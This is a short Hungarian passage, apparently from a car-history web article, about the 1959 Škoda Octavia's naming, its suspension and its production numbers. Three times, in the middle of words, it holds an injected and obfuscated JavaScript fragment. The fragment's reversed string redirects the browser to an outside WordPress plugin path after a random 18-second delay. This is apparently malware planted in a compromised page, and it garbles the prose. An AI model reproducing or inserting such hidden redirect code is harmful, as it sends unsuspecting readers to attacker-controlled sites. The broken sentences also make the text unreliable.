Az „Ős-Octavia” 1959-től nagyvonalú térkínálattal és korszerű technikával hódítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott. Ez volt a nyolcadik független kerékfelfüggesztéssel készülő Škoda, egyben a cseh gyártó ugyancsak nyolcadik modellje a második világháború után. Az Octavia nevének forrása ezért a latin „Octoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to”, vagyis a „nyolc” számnév. Tizenkét éves gyártása – 1964-ig lépcsős hátú, 1971-ig kombiváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozatban – alatt a Škoda összesen mintegy 400 ezer darabot készített belőle.
- Hirdetés -